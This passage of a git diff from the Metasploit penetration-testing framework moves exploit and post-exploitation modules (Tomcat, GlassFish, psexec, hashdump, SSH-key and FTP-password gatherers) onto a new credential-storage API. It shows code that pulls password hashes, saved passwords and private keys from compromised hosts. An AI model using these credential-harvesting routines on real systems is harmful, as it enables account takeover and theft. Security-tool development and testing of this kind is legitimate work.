+        vprint_status "#{ip}:#{rport}: Login failed: #{result.credential}"
       end
     end
   end
 
 
   def test_request
-    data = winrm_wql_msg("Select Name,Status from Win32_Service")
+    return winrm_wql_msg("Select Name,Status from Win32_Service")
   end
 
 end
diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
index 042f17ccd2..347dd7c2be 100644
--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -651,17 +651,33 @@ class Metasploit3 < Msf::Exploit::Remote
     return res
   end
 
-  def log_success(user,pass)
-    print_good("#{my_target_host()} - GlassFish - SUCCESSFUL login for '#{user}' : '#{pass}'")
-    report_auth_info(
-      :host   => rhost,
-      :port   => rport,
-      :sname  => (ssl ? "https" : "http"),
-      :user   => user,
-      :pass   => pass,
-      :proof  => "WEBAPP=\"GlassFish\", VHOST=#{vhost}",
-      :active => true
-    )
+  def log_success(user = "", pass = "")
+    service_data = {
+      address: Rex::Socket.getaddress(rhost, true),
+      port: rport,
+      protocol: "tcp",
+      service_name: ssl ? "https" : "http",
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: self.fullname,
+      username: user,
+      private_data: pass,
+      private_type: :password
+    }
+
+    credential_core = create_credential(credential_data.merge(service_data))
+
+    login_data = {
+      core: credential_core,
+      access_level: "Admin",
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      last_attempted_at: DateTime.now
+    }
+
+    create_credential_login(login_data.merge(service_data))
   end
 
   def try_default_glassfish_login(version)
@@ -708,6 +724,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     if success == true
+      print_good("#{my_target_host()} - GlassFish - SUCCESSFUL login for '#{user}' : '#{pass}'")
       log_success(user,pass)
     else
       msg = "#{my_target_host()} - GlassFish - Failed to authenticate login for '#{user}' : '#{pass}'"
@@ -739,15 +756,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if success == true
       print_good("#{my_target_host} - GlassFish - SUCCESSFUL authentication bypass")
-      report_auth_info(
-        :host   => rhost,
-        :port   => rport,
-        :sname  => (ssl ? "https" : "http"),
-        :user   => '',
-        :pass   => '',
-        :proof  => "WEBAPP=\"GlassFish\", VHOST=#{vhost}",
-        :active => true
-      )
+      log_success
     else
       print_error("#{my_target_host()} - GlassFish - Failed authentication bypass")
     end
diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
index 12c2423529..bc75cdc7dd 100644
--- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb
+++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
@@ -118,15 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return CheckCode::Unknown
     end
 
-    report_auth_info(
-      :host   => rhost,
-      :port   => rport,
-      :sname  => (ssl ? "https" : "http"),
-      :user   => datastore['USERNAME'],
-      :pass   => datastore['PASSWORD'],
-      :proof  => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
-      :active => true
-    )
+    report_tomcat_credential
 
     vprint_status("Target is #{detect_platform(res.body)} #{detect_arch(res.body)}")
     return CheckCode::Appears
@@ -209,15 +201,7 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::Unknown, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]")
     end
 
-    report_auth_info(
-      :host   => rhost,
-      :port   => rport,
-      :sname  => (ssl ? "https" : "http"),
-      :user   => datastore['USERNAME'],
-      :pass   => datastore['PASSWORD'],
-      :proof  => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
-      :active => true
-    )
+    report_tomcat_credential
 
     #
     # EXECUTE
@@ -315,4 +299,35 @@ class Metasploit3 < Msf::Exploit::Remote
     }
   end
 
+  def report_tomcat_credential
+    service_data = {
+        address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
+        port: datastore['RPORT'],
+        service_name: (ssl ? "https" : "http"),
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+        origin_type: :service,
+        module_fullname: self.fullname,
+        private_type: :password,
+        private_data: datastore['PASSWORD'].downcase,
+        username: datastore['USERNAME']
+    }
+
+    credential_data.merge!(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+        access_level: 'Admin',
+        core: credential_core,
+        last_attempted_at: DateTime.now,
+        status: Metasploit::Model::Login::Status::SUCCESSFUL
+    }
+    login_data.merge!(service_data)
+    create_credential_login(login_data)
+  end
+
 end
diff --git a/modules/exploits/multi/http/tomcat_mgr_upload.rb b/modules/exploits/multi/http/tomcat_mgr_upload.rb
index 5d24ce3b54..df46747a79 100644
--- a/modules/exploits/multi/http/tomcat_mgr_upload.rb
+++ b/modules/exploits/multi/http/tomcat_mgr_upload.rb
@@ -126,15 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     vprint_status("#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture")
 
-    report_auth_info(
-      :host   => rhost,
-      :port   => rport,
-      :sname  => (ssl ? "https" : "http"),
-      :user   => datastore['USERNAME'],
-      :pass   => datastore['PASSWORD'],
-      :proof  => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
-      :active => true
-    )
+    report_tomcat_credential
 
     return CheckCode::Appears
   end
@@ -156,15 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote
     #
     print_status("#{peer} - Uploading and deploying #{@app_base}...")
     if upload_payload
-      report_auth_info(
-        :host   => rhost,
-        :port   => rport,
-        :sname  => (ssl ? "https" : "http"),
-        :user   => datastore['USERNAME'],
-        :pass   => datastore['PASSWORD'],
-        :proof  => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
-        :active => true
-      )
+      report_tomcat_credential
     else
       fail_with(Failure::Unknown, "Upload failed")
     end
@@ -423,4 +407,35 @@ class Metasploit3 < Msf::Exploit::Remote
     return true
   end
 
+  def report_tomcat_credential
+    service_data = {
+        address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
+        port: datastore['RPORT'],
+        service_name: (ssl ? "https" : "http"),
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+        origin_type: :service,
+        module_fullname: self.fullname,
+        private_type: :password,
+        private_data: datastore['PASSWORD'].downcase,
+        username: datastore['USERNAME']
+    }
+
+    credential_data.merge!(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+        access_level: 'Admin',
+        core: credential_core,
+        last_attempted_at: DateTime.now,
+        status: Metasploit::Model::Login::Status::SUCCESSFUL
+    }
+    login_data.merge!(service_data)
+    create_credential_login(login_data)
+  end
+
 end
diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
index 827bd4b09d..435259194d 100644
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -106,20 +106,48 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     if datastore['DB_REPORT_AUTH'] and datastore['SMBUser'].to_s.strip.length > 0
-      report_hash = {
-        :host	=> datastore['RHOST'],
-        :port   => datastore['RPORT'],
-        :sname	=> 'smb',
-        :user	=> datastore['SMBUser'].downcase,
-        :pass	=> datastore['SMBPass'],
-        :active => true
+
+      service_data = {
+          address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
+          port: datastore['RPORT'],
+          service_name: 'smb',
+          protocol: 'tcp',
+          workspace_id: myworkspace_id
       }
-      if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
-        report_hash.merge!({:type => 'smb_hash'})
-      else
-        report_hash.merge!({:type => 'password'})
+
+      credential_data = {
+          origin_type: :service,
+          module_fullname: self.fullname,
+          private_data: datastore['SMBPass'],
+          username: datastore['SMBUser'].downcase
+      }
+
+      if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'
+        credential_data.merge!({
+          realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+          realm_value: datastore['SMBDomain']
+         })
       end
-      report_auth_info(report_hash)
+
+      if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
+        credential_data.merge!({:private_type => :ntlm_hash})
+      else
+        credential_data.merge!({:private_type => :password})
+      end
+
+      credential_data.merge!(service_data)
+
+      credential_core = create_credential(credential_data)
+
+      login_data = {
+          access_level: 'Admin',
+          core: credential_core,
+          last_attempted_at: DateTime.now,
+          status: Metasploit::Model::Login::Status::SUCCESSFUL
+      }
+
+      login_data.merge!(service_data)
+      login = create_credential_login(login_data)
     end
 
     filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
diff --git a/modules/post/aix/hashdump.rb b/modules/post/aix/hashdump.rb
index d2b0659116..283b7e6628 100644
--- a/modules/post/aix/hashdump.rb
+++ b/modules/post/aix/hashdump.rb
@@ -27,32 +27,43 @@ class Metasploit3 < Msf::Post
   def run
     if is_root?
       passwd_file = read_file("/etc/security/passwd")
-      jtr = parse_aix_passwd(passwd_file)
-      p = store_loot("aix.hashes", "text/plain", session, jtr, "aix_passwd.txt", "AIX Password File")
-      vprint_status("Passwd saved in: #{p.to_s}")
+
+      username = ''
+      hash     = ''
+
+      passwd_file.each_line do |line|
+        user_line = line.match(/(\w+):/)
+        if user_line
+          username = user_line[1]
+        end
+
+        hash_line = line.match(/password = (\w+)/)
+        if hash_line
+          hash = hash_line[1]
+        end
+
+        if hash.present?
+          print_good "#{username}:#{hash}"
+          credential_data = {
+              jtr_format: 'des',
+              origin_type: :session,
+              post_reference_name: self.refname,
+              private_type: :nonreplayable_hash,
+              private_data: hash,
+              session_id: session_db_id,
+              username: username,
+              workspace_id: myworkspace_id
+          }
+          create_credential(credential_data)
+          username = ''
+          hash     = ''
+        end
+      end
+
     else
       print_error("You must run this module as root!")
     end
 
   end
 
-
-  def parse_aix_passwd(aix_file)
-    jtr_file = ""
-    tmp = ""
-    aix_file.each_line do |line|
-      username = line.match(/(\w+:)/)
-      if username
-        tmp = username[0]
-      end
-      hash = line.match(/password = (\w+)/)
-      if hash
-        tmp << hash[1]
-        jtr_file << "#{tmp}\n"
-      end
-    end
-    return jtr_file
-  end
-
-
 end
diff --git a/modules/post/linux/gather/hashdump.rb b/modules/post/linux/gather/hashdump.rb
index d7534025ec..9c483a78ce 100644
--- a/modules/post/linux/gather/hashdump.rb
+++ b/modules/post/linux/gather/hashdump.rb
@@ -37,6 +37,19 @@ class Metasploit3 < Msf::Post
       # Unshadow the files
       john_file = unshadow(passwd_file, shadow_file)
       john_file.each_line do |l|
+        hash_parts = l.split(':')
+
+        credential_data = {
+            jtr_format: 'md5,des,bsdi,crypt',
+            origin_type: :session,
+            post_reference_name: self.refname,
+            private_type: :nonreplayable_hash,
+            private_data: hash_parts[1],
+            session_id: session_db_id,
+            username: hash_parts[0],
+            workspace_id: myworkspace_id
+        }
+        create_credential(credential_data)
         print_good(l.chomp)
       end
       # Save pwd file
diff --git a/modules/post/multi/gather/firefox_creds.rb b/modules/post/multi/gather/firefox_creds.rb
index 0b39193458..76b090602a 100644
--- a/modules/post/multi/gather/firefox_creds.rb
+++ b/modules/post/multi/gather/firefox_creds.rb
@@ -3,10 +3,24 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+#
+# Standard Library
+#
+
+require 'tmpdir'
+
+#
+# Gems
+#
+
+require 'zip'
+
+#
+# Project
+#
+
 require 'msf/core'
 require 'rex'
-require 'zip/zip'
-require 'tmpdir'
 require 'msf/core/auxiliary/report'
 
 class Metasploit3 < Msf::Post
@@ -104,10 +118,10 @@ class Metasploit3 < Msf::Post
       begin
         # automatically commits the changes made to the zip archive when
         # the block terminates
-        Zip::ZipFile.open(tmp) do |zip_file|
+        Zip::File.open(tmp) do |zip_file|
           res = modify_omnija(zip_file)
         end
-      rescue Zip::ZipError => e
+      rescue Zip::Error => e
         print_error("Error modifying #{new_file}")
         return
       end
diff --git a/modules/post/multi/gather/pgpass_creds.rb b/modules/post/multi/gather/pgpass_creds.rb
index 1626252cad..a9d1398a98 100644
--- a/modules/post/multi/gather/pgpass_creds.rb
+++ b/modules/post/multi/gather/pgpass_creds.rb
@@ -73,6 +73,8 @@ class Metasploit3 < Msf::Post
     )
 
     read_file(f).each_line do |entry|
+      # skip comments
+      next if entry.lstrip[0,1] == "#"
       ip, port, db, user, pass = entry.chomp.split(/:/, 5)
 
       # Fix for some weirdness that happens with backslashes
@@ -97,21 +99,46 @@ class Metasploit3 < Msf::Post
       end
 
       pass = p
+
+      # Display the original before we try to report it, so the user
+      # sees whatever was actually in the file in case it's weird
       cred_table << [ip, port, db, user, pass]
 
-      cred_hash = {
-        :host => session.session_host,
-        :port => port,
-        :user => user,
-        :pass => pass,
-        :ptype => "password",
-        :sname => "postgres",
-        :source_type => "Cred",
-        :duplicate_ok => true,
-        :active => true
+      if ip == "*" || ip == "localhost"
+        ip = session.session_host
+      else
+        ip = Rex::Socket.getaddress(ip)
+      end
+
+      # Use the default postgres port if the file had a wildcard
+      port = 5432 if port == "*"
+
+      credential_data = {
+        origin_type: :session,
+        session_id: session_db_id,
+        post_reference_name: self.refname,
+        username: user,
+        private_data: pass,
+        private_type: :password,
+        realm_value: db,
+        realm_key: Metasploit::Model::Realm::Key::POSTGRESQL_DATABASE,
+        workspace_id: myworkspace_id
       }
 
-      report_auth_info(cred_hash)
+      credential_core = create_credential(credential_data)
+
+      login_data = {
+        address: ip,
+        port: port,
+        protocol: "tcp",
+        service_name: "postgres",
+        core: credential_core,
+        access_level: "User",
+        status: Metasploit::Model::Login::Status::UNTRIED,
+        workspace_id: myworkspace_id
+      }
+      create_credential_login(login_data)
+
     end
 
     if not cred_table.rows.empty?
diff --git a/modules/post/multi/gather/ssh_creds.rb b/modules/post/multi/gather/ssh_creds.rb
index 335e8672b4..4832a34f9a 100644
--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -60,29 +60,27 @@ class Metasploit3 < Msf::Post
         next if [".", ".."].include?(file)
         data = read_file("#{path}#{sep}#{file}")
         file = file.split(sep).last
-        loot_path = store_loot("ssh.#{file}", "text/plain", session, data,
-          "ssh_#{file}", "OpenSSH #{file} File")
-        print_good("Downloaded #{path}#{sep}#{file} -> #{loot_path}")
 
-        # If the key is encrypted, this will fail and it won't be stored as a
-        # cred.  That's ok because we can't really use encrypted keys anyway.
-        key = SSHKey.new(data, :passphrase => "") rescue nil
-        if key and loot_path
-          print_status("Saving private key #{file} as cred")
-          cred_hash = {
-            :host => session.session_host,
-            :port => 22,
-            :sname => 'ssh',
-            :user => user,
-            :pass => loot_path,
-            :source_type => "exploit",
-            :type => 'ssh_key',
-            :proof => "KEY=#{key.fingerprint}",
-            :duplicate_ok => true,
-            :active => true
+        print_good("Downloaded #{path}#{sep}#{file}")
+
+        begin
+          key = SSHKey.new(data, :passphrase => "")
+
+          credential_data = {
+            origin_type: :session,
+            session_id: session_db_id,
+            post_reference_name: self.refname,
+            private_type: :ssh_key,
+            private_data: key.key_object.to_s,
+            username: user,
+            workspace_id: myworkspace_id
           }
-          report_auth_info(cred_hash)
+
+          create_credential(credential_data)
+        rescue OpenSSL::OpenSSLError => e
+          print_error("Could not load SSH Key: #{e.message}")
         end
+
       end
 
     end
diff --git a/modules/post/osx/gather/autologin_password.rb b/modules/post/osx/gather/autologin_password.rb
index 25f14542f4..1136f69faa 100644
--- a/modules/post/osx/gather/autologin_password.rb
+++ b/modules/post/osx/gather/autologin_password.rb
@@ -61,13 +61,18 @@ class Metasploit3 < Msf::Post
     end.join.sub(/\x00.*$/, '')
 
     # save in the database
-    report_auth_info(
-      :host   => session.session_host,
-      :sname  => 'login',
-      :user   => autouser,
-      :pass   => decoded,
-      :active => true
-    )
+    # Don't record a Login, since we don't know what service to tie it to
+    credential_data = {
+      workspace_id: myworkspace_id,
+      origin_type: :session,
+      session_id: session_db_id,
+      post_reference_name: self.refname,
+      username: autouser,
+      private_data: decoded,
+      private_type: :password
+    }
+
+    create_credential(credential_data)
     print_good "Decoded autologin password: #{autouser}:#{decoded}"
   end
 
diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb
index 85f389f207..28eadfde64 100644
--- a/modules/post/osx/gather/hashdump.rb
+++ b/modules/post/osx/gather/hashdump.rb
@@ -42,9 +42,6 @@ class Metasploit3 < Msf::Post
   def run
     fail_with("Insufficient Privileges: must be running as root to dump the hashes") unless root?
 
-    # build a single hash_file containing all users' hashes
-    hash_file = ''
-
     # iterate over all users
     users.each do |user|
       next if datastore['MATCHUSER'].present? and datastore['MATCHUSER'] !~ user
@@ -70,27 +67,25 @@ class Metasploit3 < Msf::Post
         iterations = dict.elements[4].text.gsub(/\s+/, '')
         salt = Rex::Text.to_hex(dict.elements[6].text.gsub(/\s+/, '').unpack('m*')[0], '')
 
-        # PBKDF2 stored in <user, iterations, salt, entropy> format
-        decoded_hash = "#{user}:$ml$#{iterations}$#{salt}$#{entropy}"
-        print_good "SHA512:#{decoded_hash}"
-        hash_file << decoded_hash
+        # PBKDF2 stored in <iterations, salt, entropy> format
+        decoded_hash = "$ml$#{iterations}$#{salt}$#{entropy}"
+        report_hash("SHA-512 PBKDF2", decoded_hash, user)
       elsif lion? # 10.7
         # pull the shadow from dscl
         shadow_bytes = grab_shadow_blob(user)
         next if shadow_bytes.blank?
 
         # on 10.7 the ShadowHashData is stored in plaintext
-        hash_decoded = shadow_bytes.upcase
+        hash_decoded = shadow_bytes.downcase
 
         # Check if NT HASH is present
-        if hash_decoded =~ /4F1010/
-          report_nt_hash(hash_decoded.scan(/^\w*4F1010(\w*)4F1044/)[0][0], user)
+        if hash_decoded =~ /4f1010/
+          report_hash("NT", hash_decoded.scan(/^\w*4f1010(\w*)4f1044/)[0][0], user)
         end
 
         # slice out the sha512 hash + salt
-        sha512 = hash_decoded.scan(/^\w*4F1044(\w*)(080B190|080D101E31)/)[0][0]
-        print_status("SHA512:#{user}:#{sha512}")
-        hash_file << "#{user}:#{sha512}\n"
+        sha512 = hash_decoded.scan(/^\w*4f1044(\w*)(080b190|080d101e31)/)[0][0]
+        report_hash("SHA-512", sha512, user)
       else # 10.6 and below
         # On 10.6 and below, SHA-1 is used for encryption
         guid = if gte_leopard?
@@ -106,38 +101,16 @@ class Metasploit3 < Msf::Post
 
         # Check that we have the hashes and save them
         if sha1_hash !~ /0000000000000000000000000/
-          print_status("SHA1:#{user}:#{sha1_hash}")
-          hash_file << "#{user}:#{sha1_hash}"
+          report_hash("SHA-1", sha1_hash, user)
         end
         if nt_hash !~ /000000000000000/
-          report_nt_hash(nt_hash, user)
+          report_hash("NT", nt_hash, user)
         end
         if lm_hash !~ /0000000000000/
-          print_status("LM:#{user}:#{lm_hash}")
-          print_status("Credential saved in database.")
-          report_auth_info(
-            :host   => host,
-            :port   => 445,
-            :sname  => 'smb',
-            :user   => user,
-            :pass   => "#{lm_hash}:",
-            :active => true
-          )
+          report_hash("LM", lm_hash, user)
         end
       end
     end
-    # Save pwd file
-    upassf = if gt_lion?
-      store_loot("osx.hashes.sha512pbkdf2", "text/plain", session, hash_file,
-                 "unshadowed_passwd.pwd", "OSX Unshadowed SHA-512PBKDF2 Password File")
-    elsif lion?
-      store_loot("osx.hashes.sha512", "text/plain", session, hash_file,
-                 "unshadowed_passwd.pwd", "OSX Unshadowed SHA-512 Password File")
-    else
-      store_loot("osx.hashes.sha1", "text/plain", session, hash_file,
-                 "unshadowed_passwd.pwd", "OSX Unshadowed SHA-1 Password File")
-    end
-    print_good("Unshadowed Password File: #{upassf}")
   end
 
   private
@@ -189,19 +162,31 @@ class Metasploit3 < Msf::Post
     return fields
   end
 
-  # reports the NT hash info to metasploit backend
-  def report_nt_hash(nt_hash, user)
-    return unless nt_hash.present?
-    print_status("NT:#{user}:#{nt_hash}")
-    print_status("Credential saved in database.")
-    report_auth_info(
-      :host   => host,
-      :port   => 445,
-      :sname  => 'smb',
-      :user   => user,
-      :pass   => "AAD3B435B51404EE:#{nt_hash}",
-      :active => true
+  # reports the hash info to metasploit backend
+  def report_hash(type, hash, user)
+    return unless hash.present?
+    print_status("#{type}:#{user}:#{hash}")
+    case type
+    when "NT"
+      private_data = "#{Metasploit::Credential::NTLMHash::BLANK_LM_HASH}:#{hash}"
+      private_type = :ntlm_hash
+    when "LM"
+      private_data = "#{hash}:#{Metasploit::Credential::NTLMHash::BLANK_NT_HASH}"
+      private_type = :ntlm_hash
+    when "SHA-512 PBKDF2", "SHA-512", "SHA-1"
+      private_data = hash
+      private_type = :nonreplayable_hash
+    end
+    create_credential(
+      workspace_id: myworkspace_id,
+      origin_type: :session,
+      session_id: session_db_id,
+      post_reference_name: self.refname,
+      username: user,
+      private_data: private_data,
+      private_type: private_type
     )
+    print_status("Credential saved in database.")
   end
 
   # Checks if running as root on the target
diff --git a/modules/post/windows/gather/credentials/bulletproof_ftp.rb b/modules/post/windows/gather/credentials/bulletproof_ftp.rb
index fb253f037c..acdbc7efc7 100644
--- a/modules/post/windows/gather/credentials/bulletproof_ftp.rb
+++ b/modules/post/windows/gather/credentials/bulletproof_ftp.rb
@@ -182,12 +182,6 @@ class Metasploit3 < Msf::Post
 
   def report_findings(entries)
 
-    if session.db_record
-      source_id = session.db_record.id
-    else
-      source_id = nil
-    end
-
     entries.each{ |entry|
       @credentials << [
         entry[:site_name],
@@ -199,17 +193,32 @@ class Metasploit3 < Msf::Post
         entry[:local_dir]
       ]
 
-      report_auth_info(
-        :host  => entry[:site_address],
-        :port => entry[:port],
-        :proto => 'tcp',
-        :sname => 'ftp',
-        :user => entry[:login],
-        :pass => entry[:password],
-        :ptype => 'password',
-        :source_id => source_id,
-        :source_type => "exploit"
-      )
+      service_data = {
+        address: Rex::Socket.getaddress(entry[:site_address]),
+        port: entry[:port],
+        protocol: "tcp",
+        service_name: "ftp",
+        workspace_id: myworkspace_id
+      }
+
+      credential_data = {
+        origin_type: :session,
+        session_id: session_db_id,
+        post_reference_name: self.refname,
+        username: entry[:login],
+        private_data: entry[:password],
+        private_type: :password
+      }
+
+      credential_core = create_credential(credential_data.merge(service_data))
+
+      login_data = {
+        core: credential_core,
+        access_level: "User",
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      create_credential_login(login_data.merge(service_data))
     }
   end
 
@@ -234,8 +243,8 @@ class Metasploit3 < Msf::Post
     print_status("Searching BulletProof FTP Client installation directory...")
     # BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files
     progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
-    progfilesx86 = prog_files_env['ProgramFiles(X86)']
-    if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
+    progfilesx86 = progfiles_env['ProgramFiles(X86)']
+    if !progfilesx86.blank? && progfilesx86 !~ /%ProgramFiles\(X86\)%/
       program_files = progfilesx86 # x64
     else
       program_files = progfiles_env['ProgramFiles'] # x86
diff --git a/modules/post/windows/gather/credentials/coreftp.rb b/modules/post/windows/gather/credentials/coreftp.rb
index 88d9d44539..1132f223ee 100644
--- a/modules/post/windows/gather/credentials/coreftp.rb
+++ b/modules/post/windows/gather/credentials/coreftp.rb
@@ -49,24 +49,38 @@ class Metasploit3 < Msf::Post
           pass = decrypt(epass)
           pass = pass.gsub(/\x00/, '') if pass != nil and pass != ''
           print_good("Host: #{host} Port: #{port} User: #{user}  Password: #{pass}")
-          if session.db_record
-            source_id = session.db_record.id
-          else
-            source_id = nil
-          end
-          auth =
-            {
-              :host => host,
-              :port => port,
-              :sname => 'ftp',
-              :user => user,
-              :pass => pass,
-              :type => 'password',
-              :source_id => source_id,
-              :source_type => "exploit",
-              :active => true
-            }
-          report_auth_info(auth)
+
+          service_data = {
+            address: host,
+            port: port,
+            service_name: 'ftp',
+            protocol: 'tcp',
+            workspace_id: myworkspace_id
+          }
+
+          credential_data = {
+              origin_type: :session,
+              session_id: session_db_id,
+              post_reference_name: self.refname,
+              private_type: :password,
+              private_data: pass,
+              username: user
+          }
+
+          credential_data.merge!(service_data)
+
+          # Create the Metasploit::Credential::Core object
+          credential_core = create_credential(credential_data)
+
+          # Assemble the options hash for creating the Metasploit::Credential::Login object
+          login_data ={
+              core: credential_core,
+              status: Metasploit::Model::Login::Status::UNTRIED
+          }
+
+          # Merge in the service data and create our Login
+          login_data.merge!(service_data)
+          login = create_credential_login(login_data)
         end
       rescue
         print_error("Cannot Access User SID: #{hive['HKU']}")
diff --git a/modules/post/windows/gather/credentials/enum_cred_store.rb b/modules/post/windows/gather/credentials/enum_cred_store.rb
index a12997c5fa..83e844e5bb 100644
--- a/modules/post/windows/gather/credentials/enum_cred_store.rb
+++ b/modules/post/windows/gather/credentials/enum_cred_store.rb
@@ -122,9 +122,11 @@ class Metasploit3 < Msf::Post
       if cred["targetname"].include? "TERMSRV"
         host = cred["targetname"].gsub("TERMSRV/","")
         port = 3389
+        service = "rdp"
       elsif cred["type"] == 2
         host = cred["targetname"]
         port = 445
+        service = "smb"
       else
         return false
       end
@@ -132,23 +134,32 @@ class Metasploit3 < Msf::Post
       ip_add= gethost(host)
 
       unless ip_add.nil?
-        if session.db_record
-          source_id = session.db_record.id
-        else
-          source_id = nil
-        end
-        auth = {
-          :host => ip_add,
-          :port => port,
-          :user => cred["username"],
-          :pass => cred["password"],
-          :type => 'password',
-          :source_id => source_id,
-          :source_type => "exploit",
-          :active => true
+        service_data = {
+          address: ip_add,
+          port: port,
+          protocol: "tcp",
+          service_name: service,
+          workspace_id: myworkspace_id
         }
 
-        report_auth_info(auth)
+        credential_data = {
+          origin_type: :session,
+          session_id: session_db_id,
+          post_reference_name: self.refname,
+          username: cred["username"],
+          private_data: cred["password"],
+          private_type: :password
+        }
+
+        credential_core = create_credential(credential_data.merge(service_data))
+
+        login_data = {
+          core: credential_core,
+          access_level: "User",
+          status: Metasploit::Model::Login::Status::UNTRIED
+        }
+
+        create_credential_login(login_data.merge(service_data))
         print_status("Credentials for #{ip_add} added to db")
       else
         return
diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb
index a91a08f04f..a51bd5c827 100644
--- a/modules/post/windows/gather/credentials/epo_sql.rb
+++ b/modules/post/windows/gather/credentials/epo_sql.rb
@@ -124,21 +124,32 @@ class Metasploit3 < Msf::Post
 
     if (db_ip)
       # submit to reports
-      if session.db_record
-        source_id = session.db_record.id
-      else
-        source_id = nil
-      end
-      report_auth_info(
-        :host => db_ip,
-        :port => port,
-        :sname => 'mssql',
-        :user => full_user,
-        :pass => plaintext_passwd,
-        :source_id => source_id,
-        :source_type => "exploit",
-        :active => true
-      )
+      service_data = {
+        address: Rex::Socket.getaddress(db_ip),
+        port: port,
+        protocol: "tcp",
+        service_name: "mssql",
+        workspace_id: myworkspace_id
+      }
+
+      credential_data = {
+        origin_type: :session,
+        session_id: session_db_id,
+        post_reference_name: self.refname,
+        username: full_user,
+        private_data: plaintext_passwd,
+        private_type: :password
+      }
+
+      credential_core = create_credential(credential_data.merge(service_data))
+
+      login_data = {
+        core: credential_core,
+        access_level: "User",
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      create_credential_login(login_data.merge(service_data))
       print_good("Added credentials to report database")
     else
       print_error("Could not determine IP of DB - credentials not added to report database")
diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb
index e562129d68..494d91681b 100644
--- a/modules/post/windows/gather/credentials/filezilla_server.rb
+++ b/modules/post/windows/gather/credentials/filezilla_server.rb
@@ -33,13 +33,7 @@ class Metasploit3 < Msf::Post
       return
     end
 
-    drive = session.sys.config.getenv('SystemDrive')
-    case session.platform
-    when /win64/i
-      @progs = drive + '\\Program Files (x86)\\'
-    when /win32/i
-      @progs = drive + '\\Program Files\\'
-    end
+    @progs = "#{session.sys.config.getenv('ProgramFiles')}\\"
 
     filezilla = check_filezilla
     if filezilla != nil
@@ -147,20 +141,39 @@ class Metasploit3 < Msf::Post
         source_id = nil
       end
 
-      # report the goods!
-      report_auth_info(
-        :host  => session.sock.peerhost,
-        :port => config['ftp_port'],
-        :sname => 'ftp',
-        :proto => 'tcp',
-        :user => cred['user'],
-        :pass => cred['password'],
-        :ptype => "MD5 hash",
-        :source_id => source_id,
-        :source_type => "exploit",
-        :target_host => config['ftp_bindip'],
-        :target_port => config['ftp_port']
-      )
+
+      service_data = {
+          address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
+          port: config['ftp_port'],
+          service_name: 'ftp',
+          protocol: 'tcp',
+          workspace_id: myworkspace_id
+      }
+
+      credential_data = {
+          origin_type: :session,
+          jtr_format: 'raw-md5',
+          session_id: session_db_id,
+          post_reference_name: self.refname,
+          private_type: :nonreplayable_hash,
+          private_data: cred['password'],
+          username: cred['user']
+      }
+
+      credential_data.merge!(service_data)
+
+      credential_core = create_credential(credential_data)
+
+      # Assemble the options hash for creating the Metasploit::Credential::Login object
+      login_data ={
+          core: credential_core,
+          status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      # Merge in the service data and create our Login
+      login_data.merge!(service_data)
+      login = create_credential_login(login_data)
+
     end
 
     perms.each do |perm|
@@ -190,19 +203,37 @@ class Metasploit3 < Msf::Post
       #the module will crash with an error.
       vprint_status("(No admin information found.)")
     else
-      report_auth_info(
-        :host  => session.sock.peerhost,
-        :port => config['admin_port'],
-        :sname => 'filezilla-admin',
-        :proto => 'tcp',
-        :user => 'admin',
